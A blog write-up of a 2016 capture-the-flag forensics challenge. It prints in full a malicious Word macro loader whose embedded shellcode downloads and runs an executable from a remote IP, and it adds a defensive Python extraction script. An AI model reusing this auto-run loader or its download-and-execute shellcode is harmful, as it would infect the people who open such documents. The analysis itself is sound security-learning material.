Writeup – WhereWouldWeBeWithout (Bsides Canberra 2016)

Things have been a little busy over the past week, so here’s a belated writeup for the WhereWouldWeBeWithout challenge at BSides. This was a forensics challenge: the description indicated that a user had downloaded a malicious attachment (supplied), and we needed to identify where the attacker came from.

Initially, I tried unzipping the Word document, only to find that while there was definitely some scripting content inside, it was not in an easily readable text format (the VBA modules sit in compressed streams inside the embedded OLE file). Didier Stevens’ “oledump.py” came to the rescue:

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Vba7 Then
 Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Nsacyiv As Long, ByVal Xfteasxx As Long, ByVal Lzxkfhgja As LongPtr, Pgbsmonke As Long, ByVal Hezaf As Long, Vdpkryp As Long) As LongPtr
 Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Rifi As Long, ByVal Ugdqsefpi As Long, ByVal Obr As Long, ByVal Yinc As Long) As LongPtr
 Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Zilanuijf As LongPtr, ByRef Axg As Any, ByVal Zuosiow As Long) As LongPtr
#Else
 Private Declare Function CreateThread Lib "kernel32" (ByVal Nsacyiv As Long, ByVal Xfteasxx As Long, ByVal Lzxkfhgja As Long, Pgbsmonke As Long, ByVal Hezaf As Long, Vdpkryp As Long) As Long
 Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Rifi As Long, ByVal Ugdqsefpi As Long, ByVal Obr As Long, ByVal Yinc As Long) As Long
 Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Zilanuijf As Long, ByRef Axg As Any, ByVal Zuosiow As Long) As Long
#End If

Sub Auto_Open()
 Dim Jbqcei As Long, Fwxxsoyv As Variant, Anqyc As Long
#If Vba7 Then
 Dim Ufbxamnhb As LongPtr, Lpazi As LongPtr
#Else
 Dim Ufbxamnhb As Long, Lpazi As Long
#End If
 Fwxxsoyv = Array(232, 137, 0, 0, 0, 96, 137, 229, 49, 210, 100, 139, 82, 48, 139, 82, 12, 139, 82, 20, _
139, 114, 40, 15, 183, 74, 38, 49, 255, 49, 192, 172, 60, 97, 124, 2, 44, 32, 193, 207, _
13, 1, 199, 226, 240, 82, 87, 139, 82, 16, 139, 66, 60, 1, 208, 139, 64, 120, 133, 192, _
116, 74, 1, 208, 80, 139, 72, 24, 139, 88, 32, 1, 211, 227, 60, 73, 139, 52, 139, 1, _
214, 49, 255, 49, 192, 172, 193, 207, 13, 1, 199, 56, 224, 117, 244, 3, 125, 248, 59, 125, _
36, 117, 226, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, _
139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 88, 95, 90, 139, 18, _
235, 134, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 137, 230, 84, 104, 76, 119, 38, _
7, 255, 213, 49, 255, 87, 87, 87, 87, 86, 104, 58, 86, 121, 167, 255, 213, 235, 99, 91, _
49, 201, 81, 81, 106, 3, 81, 81, 104, 187, 1, 0, 0, 83, 80, 104, 87, 137, 159, 198, _
255, 213, 235, 79, 89, 49, 210, 82, 104, 0, 50, 160, 132, 82, 82, 82, 81, 82, 80, 104, _
235, 85, 46, 59, 255, 213, 137, 198, 106, 16, 91, 104, 128, 51, 0, 0, 137, 224, 106, 4, _
80, 106, 31, 86, 104, 117, 70, 158, 134, 255, 213, 49, 255, 87, 87, 87, 87, 86, 104, 45, _
6, 24, 123, 255, 213, 133, 192, 117, 45, 75, 15, 132, 138, 0, 0, 0, 235, 209, 233, 156, _
0, 0, 0, 232, 172, 255, 255, 255, 47, 99, 116, 102, 47, 109, 97, 108, 105, 99, 105, 111, _
117, 115, 95, 98, 105, 110, 97, 114, 121, 46, 101, 120, 101, 0, 235, 107, 49, 192, 95, 80, _
106, 2, 106, 2, 80, 106, 2, 106, 2, 87, 104, 218, 246, 218, 79, 255, 213, 147, 49, 192, _
102, 184, 4, 3, 41, 196, 84, 141, 76, 36, 8, 49, 192, 180, 3, 80, 81, 86, 104, 18, _
150, 137, 226, 255, 213, 133, 192, 116, 45, 88, 133, 192, 116, 22, 106, 0, 84, 80, 141, 68, _
36, 12, 80, 83, 104, 45, 87, 174, 91, 255, 213, 131, 236, 4, 235, 206, 83, 104, 198, 150, _
135, 82, 255, 213, 106, 0, 87, 104, 49, 139, 111, 135, 255, 213, 106, 0, 104, 240, 181, 162, _
86, 255, 213, 232, 144, 255, 255, 255, 114, 117, 110, 100, 49, 49, 46, 101, 120, 101, 0, 232, _
247, 254, 255, 255, 49, 49, 57, 46, 49, 53, 46, 49, 48, 49, 46, 49, 55, 0)

 Ufbxamnhb = VirtualAlloc(0, UBound(Fwxxsoyv), &H1000, &H40)
 For Anqyc = LBound(Fwxxsoyv) To UBound(Fwxxsoyv)
 Jbqcei = Fwxxsoyv(Anqyc)
 Lpazi = RtlMoveMemory(Ufbxamnhb + Anqyc, Jbqcei, 1)
 Next Anqyc
 Lpazi = CreateThread(0, 0, Ufbxamnhb, 0, 0, 0)
End Sub
Sub AutoOpen()
 Auto_Open
End Sub
Sub Workbook_Open()
 Auto_Open
End Sub

The above code is, after a bit of scrolling down, immediately apparent as a loader: it takes an array of bytes (shellcode), copies it one byte at a time into newly allocated executable memory (VirtualAlloc with &H40, i.e. PAGE_EXECUTE_READWRITE) and starts a new thread at its start. A bit of quick Python later, the bytes are out as a binary, and we can pop that into IDA Pro. The binary doesn’t disassemble cleanly (you load it at 0 and need to fiddle with forcing/unforcing code interpretation), but two strings immediately stand out:

seg000:000001BC a119_15_101_17  db '119.15.101.17',0
seg000:00000120 aCtfMalicious_b db '/ctf/malicious_binary.exe'
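The extraction step mentioned above, as an added example that is not code from the original post: a small Python script that rebuilds the byte array from oledump’s output (honouring VBA “ _” line continuations), writes it out for IDA, and runs a strings-style pass over it, which surfaces the same kind of path and IP the IDA listing shows. The sample macro text, its byte values and the function names are my own constructions; 192.0.2.1 is a documentation address, not the challenge’s.

```python
"""Rebuild the loader's byte array from oledump output and list the strings in it."""
import re
import sys

def extract_array_bytes(vba_text):
    """Parse the first Array(...) literal, honouring VBA ' _' line continuations."""
    joined = re.sub(r"[ \t]*_[ \t]*\r?\n[ \t]*", " ", vba_text)
    match = re.search(r"Array\(([^)]*)\)", joined)
    if match is None:
        raise ValueError("no Array(...) literal found")
    values = [int(tok) for tok in match.group(1).split(",") if tok.strip()]
    if any(not 0 <= v <= 255 for v in values):
        raise ValueError("Array literal contains values outside 0..255")
    return bytes(values)

def printable_strings(blob, min_len=4):
    """Return runs of printable ASCII at least min_len long (like the `strings` tool)."""
    return [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)]

def ipv4_strings(strings):
    """Keep only dotted-quad candidates, e.g. the download host the writeup found."""
    return [s for s in strings if re.fullmatch(r"(\d{1,3}\.){3}\d{1,3}", s)]

# Constructed sample (not the real macro): three NOPs, a path and a documentation IP.
SAMPLE_VBA = (
    "Sub Auto_Open()\n"
    " Fwxxsoyv = Array(144, 144, 144, 47, 116, 101, 115, 116, 46, 101, _\n"
    "120, 101, 0, 49, 57, 50, 46, 48, 46, 50, 46, 49, 0)\n"
    " Ufbxamnhb = VirtualAlloc(0, UBound(Fwxxsoyv), &H1000, &H40)\n"
    "End Sub\n"
)

def analyse(vba_text, out_path=None):
    """Extract the bytes, optionally write them to disk, and return the strings found."""
    blob = extract_array_bytes(vba_text)
    if out_path:
        with open(out_path, "wb") as fh:  # the raw blob you would load into IDA at 0
            fh.write(blob)
    return printable_strings(blob)

if __name__ == "__main__":
    # usage: python extract_shellcode.py <oledump_output.vba> [shellcode.bin]
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_VBA
    found = analyse(text, sys.argv[2] if len(sys.argv) > 2 else None)
    for s in found:
        print(("IP   " if s in ipv4_strings(found) else "str  ") + s)
```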

Given the references to “wininet” elsewhere within the binary, I assumed that this was a web server, on which “malicious_binary.exe” was hosted. I downloaded the binary, and upon loading that into IDA Pro, I was greeted with the familiar smell of Metasploit.

Given the time-limited nature of a CTF, I avoided further reverse engineering, and instead ran the binary in a sandbox, with Wireshark running on a host, quickly revealing the attacker’s origin (d0.ms) and the flag:

BSIDES_CTF{f78b6c32e0369b6d95718fa7d1e2f173}

Props as always to the CTF creators – this was an interesting challenge that eventually led to me investigating the excellent DidierStevensSuite set of tools.

About Norman

Sometimes, I write code. Occasionally, it even works.